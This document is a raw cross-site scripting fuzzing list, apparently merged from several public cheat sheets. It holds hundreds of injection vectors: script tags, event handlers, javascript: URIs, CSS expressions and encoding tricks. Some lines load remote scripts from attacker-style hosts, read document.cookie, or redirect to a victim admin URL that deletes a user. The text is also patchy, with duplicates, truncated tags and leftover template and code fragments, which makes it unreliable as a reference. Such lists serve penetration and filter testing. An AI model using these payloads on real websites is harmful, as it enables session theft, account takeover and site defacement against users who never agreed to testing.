	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	<a id="fuzzelement1" rel="nofollow noopener" target="_blank">test</a>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"`'>
	"/>
	"/>
	"/>
	"/>
	"/>
	"/>
	"/>
	"/>
	"/>
	javascript:alert(1)
	javascript:alert(1)
	javascript:alert(1)
	javascript:alert(1)
	javascript:alert(1)
	javascript:alert(1)
	javascript:alert(1)
	">
	">
	">
	">
	">
	">
	">
	">
	">
	">
	">
	">
	">
	">
	">
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>
	`"'>




	<b>alert(1)0





	">
	">
	">
	">

	<% foo>



































	<a rel="nofollow noopener" target="_blank">XXX</a>



	<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(1)></a>">
	<!--[if]><script>javascript:alert(1)</script -->
	<!--[if<img src=x onerror=javascript:alert(1)//]> -->
	<script src="/\%(jscript)s"></script>
	<script src="\\%(jscript)s"></script>
	<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>
	<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
	<style>p[foo=bar{}{-o-link:'javascript:javascript:alert(1)'}{}{-o-link-source:current}]{color:red};</style>
	<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
	<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
	<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(1);">XXX</a></a><a href="javascript:javascript:alert(1)">XXX</a>
	<style>*[{}@import'%(css)s?]</style>X
	<div style="font-family:'foo
	;color:red;';">XXX
	<div style="font-family:foo}color=red;">XXX
	<// style=x:expression\28javascript:alert(1)\29>
	<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style>
	<div style=content:url(%(svg)s)></div>
	<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
	<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>
	<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
	<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X
	<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>
	<x style="background:url('x;color:red;/*')">XXX</x>
	<script>({set//$($){_//setter=$,_=javascript:alert(1)}}).$=eval</script>
	<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
	<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(1)}),x</script>
	<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(1)')()</script>
	<meta charset="x-imap4-modified-utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
	<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>
	<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
	X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
	1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=javascript:alert(1)>`>
	1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=javascript:alert(1)>>
	<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe>
	1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>
	<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a>
	<x style="behavior:url(%(sct)s)">
	<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label>
	<event-source src="%(event)s" onload="javascript:alert(1)">
	<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">
	<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="<imgsrc=x:xonerror=javascript:alert(1)>">
	<script>%(payload)s</script>
	<script src=%(jscript)s></script>
	<script language='javascript' src='%(jscript)s'></script>
	<script>javascript:alert(1)</script>
	<IMG SRC="javascript:javascript:alert(1);">
	<IMG SRC=javascript:javascript:alert(1)>
	<IMG SRC=`javascript:javascript:alert(1)`>
	<SCRIPT SRC=%(jscript)s?<B>
	<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
	<BODY ONLOAD=javascript:alert(1)>
	<BODY ONLOAD=javascript:javascript:alert(1)>
	<IMG SRC="jav ascript:javascript:alert(1);">
	<BODY onload!#$%%&()*~+-_.,:;?@[/\|\]^`=javascript:alert(1)>
	<SCRIPT/SRC="%(jscript)s"></SCRIPT>
	<<SCRIPT>%(payload)s//<</SCRIPT>
	<IMG SRC="javascript:javascript:alert(1)"
	<iframe src=%(scriptlet)s <
	<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
	<IMG DYNSRC="javascript:javascript:alert(1)">
	<IMG LOWSRC="javascript:javascript:alert(1)">
	<BGSOUND SRC="javascript:javascript:alert(1);">
	<BR SIZE="&{javascript:alert(1)}">
	<LAYER SRC="%(scriptlet)s"></LAYER>
	<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
	<STYLE>@import'%(css)s';</STYLE>
	<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
	<XSS STYLE="behavior: url(%(htc)s);">
	<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
	<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
	<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);">
	<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
	<TABLE BACKGROUND="javascript:javascript:alert(1)">
	<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
	<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
	<DIV STYLE="width:expression(javascript:alert(1));">
	<IMG STYLE="xss:expr/XSS/ession(javascript:alert(1))">
	<XSS STYLE="xss:expression(javascript:alert(1))">
	<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
	<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A>
	<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>
	<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]-->
	<BASE HREF="javascript:javascript:alert(1);//">
	<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
	<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
	<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
	<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
	<SCRIPT SRC="%(jpg)s"></SCRIPT>
	<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
	<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
	<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
	<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
	<STYLE>@import'%(css)s';</STYLE>
	<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
	<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&>
	<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
	<style onreadystatechange=javascript:javascript:alert(1);></style>
	<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html>
	<embed code=%(scriptlet)s></embed>
	<embed code=javascript:javascript:alert(1);></embed>
	<embed src=%(jscript)s></embed>
	<frameset onload=javascript:javascript:alert(1)></frameset>
	<object onerror=javascript:javascript:alert(1)>
	<embed type="image" src=%(scriptlet)s></embed>
	<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
	<IMG SRC=&{javascript:alert(1);};>
	<a href="javAascript:javascript:alert(1)">test1</a>
	<a href="javaascript:javascript:alert(1)">test1</a>
	<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed>
	<iframe srcdoc="<iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascript:alert(1)&gt;>">
	';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
	alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
	></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
	'';!--"<XSS>=&{()}
	<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
	<IMG SRC="javascript:alert('XSS');">
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=JaVaScRiPt:alert('XSS')>
	<IMG SRC=javascript:alert("XSS")>
	<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
	<a onmouseover="alert(document.cookie)">xxs link</a>
	<a onmouseover=alert(document.cookie)>xxs link</a>
	<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
	<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
	<IMG SRC=# onmouseover="alert('xxs')">
	<IMG SRC= onmouseover="alert('xxs')">
	<IMG onmouseover="alert('xxs')">
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC=javascript:alert('XSS')>
	<IMG SRC="jav ascript:alert('XSS');">
	<IMG SRC="jav ascript:alert('XSS');">
	<IMG SRC="jav
	ascript:alert('XSS');">
	<IMG SRC="jav ascript:alert('XSS');">
	perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
	<IMG SRC=" javascript:alert('XSS');">
	<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
	<BODY onload!#$%&()*~+-_.,:;?@[/\|\]^`=alert("XSS")>
	<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
	<<SCRIPT>alert("XSS");//<</SCRIPT>
	<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
	<SCRIPT SRC=//ha.ckers.org/.j>
	<IMG SRC="javascript:alert('XSS')"
	<iframe src=http://ha.ckers.org/scriptlet.html <
	\";alert('XSS');//





	<ul><li>XSS<br>




	<br>







	exp/*<a rel="nofollow noopener" target="_blank">

	</a><a class="XSS" rel="nofollow noopener" target="_blank"></a>




	¼script¾alert(¢XSS¢)¼/script¾

















	alert("XSS")'); ?>

	Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser

	+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-






	PT SRC="http://ha.ckers.org/xss.js">
	<a href="http://66.102.7.147/" rel="nofollow noopener" target="_blank">XSS</a>
	<a href="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D" rel="nofollow noopener" target="_blank">XSS</a>
	<a href="http://1113982867/" rel="nofollow noopener" target="_blank">XSS</a>
	<a href="http://0x42.0x0000066.0x7.0x93/" rel="nofollow noopener" target="_blank">XSS</a>
	<a href="http://0102.0146.0007.00000223/" rel="nofollow noopener" target="_blank">XSS</a>
	<a rel="nofollow noopener" target="_blank">XSS</a>

	<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
	<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;"
	<sVg><scRipt >alert&lpar;1&rpar; {Opera}
	<img/src=`` onerror=this.onerror=confirm(1)
	<form><isindex formaction="javascript&colon;confirm(1)"
	<img src=``&NewLine; onerror=alert(1)&NewLine;
	<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>
	<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?
	<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">
	<script //>//alert(1)//</script //
	&#34;&#62;<h1/onmouseover='\u0061lert(1)'>
	<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>">
	<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
	<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script
	<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
	<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
	<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>
	<form><a href="javascript:\u0061lert&#x28;1&#x29;">X
	</script><img//src="worksinchrome&colon;prompt&#x28;1&#x29;"//onerror='eval(src)'>
	<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>
	<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;>
	<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a
	http://www.google<script .com>alert(document.location)</script
	<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a
	<img/src=@&#32;&#13; onerror = prompt('&#49;')
	<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;
	<script ^__^>alert(String.fromCharCode(49))</script ^__^
	</style &#32;><script &#32; :-(>//alert(document.location)//</script &#32; :-(
	&#00;</form><input type&#61;"date" onfocus="alert(1)">
	<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'>
	<script /*/>//confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')//</script /*/
	<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>
	<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
	<script ~~~>alert(0%0)</script ~~~>
	<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>
	<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN
	<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)
	&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'
	&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}
	<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^
	<div/style="width:expression(confirm(1))">X</div> {IE7}
	<iframe// src=javaSCRIPT&colon;alert(1)
	//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//
	/iframe/src/<iframe/src="<iframe/src=@"/onload=prompt(1) /iframe/src/>
	//\|\\ <script //\|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //\|\\ </script //\|\\
	</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>
	<a/href="javascript:&#13; javascript:prompt(1)"><input type="X">
	</plaintext\></\|\><plaintext/onmouseover=prompt(1)
	</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}
	<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
	<div onmouseover='alert&lpar;1&rpar;'>DIV</div>
	<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
	<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
	<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
	<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
	<var onmouseover="prompt(1)">On Mouse Over</var>
	<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
	<img src="/" =_=" title="onerror='prompt(1)'">
	<%<!--'%><script>alert(1);</script -->
	<script src="data:text/javascript,alert(1)"></script>
	<iframe/src \/\/onload = prompt(1)
	<iframe/onreadystatechange=alert(1)
	<svg/onload=alert(1)
	<input value=<><iframe/src=javascript:confirm(1)
	<input type="text" value=`` <div/onmouseover='alert(1)'>X</div>
	<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29>



	<a xlink:href="//jsfiddle.net/t846h/" rel="nofollow noopener" target="_blank">click
	</a>




	--!>

	x
	">
	CLICKME
	<a xlink:href="//jsfiddle.net/t846h/" rel="nofollow noopener" target="_blank">click


	<a rel="nofollow noopener" target="_blank">Click Me</a>
	'';!--"=&{()}
	'>//\\,<'>">">"*"
	'); alert('XSS


	</a>



	">
	ipt>alert('XSS');ipt>



	alert(\"XSS\")'); ?>





	">










	window.alert("Bonjour !");

	onload=alert('XSS')>
	">
	'">> XSS




	alert("XSS")'?>

	" onfocus=alert(document.domain) "> <"

	<ul><li>XSS
	perl -e 'print \"alert(\"XSS\")\";' > out
	perl -e 'print \"\";' > out
	<br>
	alert(1)
	<br>

	">
	[color=red width=expression(alert(123))][color]

	Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
	">

	'">
	'">
	'"">
	<<<
	(123)

	'>
	'>">
	}

	a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
	='>
	"+src="http://yoursite.com/xss.js?69,69">
	>
	">/XaDoS/>
	">/KinG-InFeT.NeT/>
	src="http://www.site.com/XSS.js">
	data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
	!--" />
	XSS by xss
	">> XSS by xss
	'">> XSS by xss
	XSS by xss
	XSS by xss
	">">> XSS by xss
	XSS by xss
	'>











	<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
	<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
	<TABLE BACKGROUND="javascript:alert('XSS')">
	<TD BACKGROUND="javascript:alert('XSS')">
	<DIV STYLE="background-image: url(javascript:alert('XSS'))">
	<DIV STYLE="width: expression(alert('XSS'));">
	<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
	<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
	&apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
	&apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}
	&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
	&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
	&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
	&lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
	&lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
	&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
	&lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
	&lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
	&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;
	&lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;
	&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;
	&lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;
	Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
	exp/&lt;XSS STYLE=&apos;no\xss:noxss(&quot;//*&quot;);
	&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
	&lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;
	&lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;
	&lt;IMG SRC=&quot;livescript:[code]&quot;&gt;
	%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
	&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;
	&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;IMG SRC=&quot;mocha:[code]&quot;&gt;
	&lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;
	&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;
	&lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;
	a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
	&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
	&lt;IMG STYLE=&quot;xss:expr/XSS/ession(alert(&apos;XSS&apos;))&quot;&gt;
	&lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;
	&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
	&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;
	&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
	&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
	&lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;
	&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;
	&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;
	&lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;
	&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
	&lt;HTML xmlns:xss&gt;
	&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
	&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
	&lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
	&lt;HTML&gt;&lt;BODY&gt;
	&lt;!--[if gte IE 4]&gt;
	&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;
	&lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;
	&lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
	&lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;
	&lt;? echo(&apos;&lt;SCR)&apos;;
	&lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;
	&lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;
	&lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
	&lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;
	&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
	&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
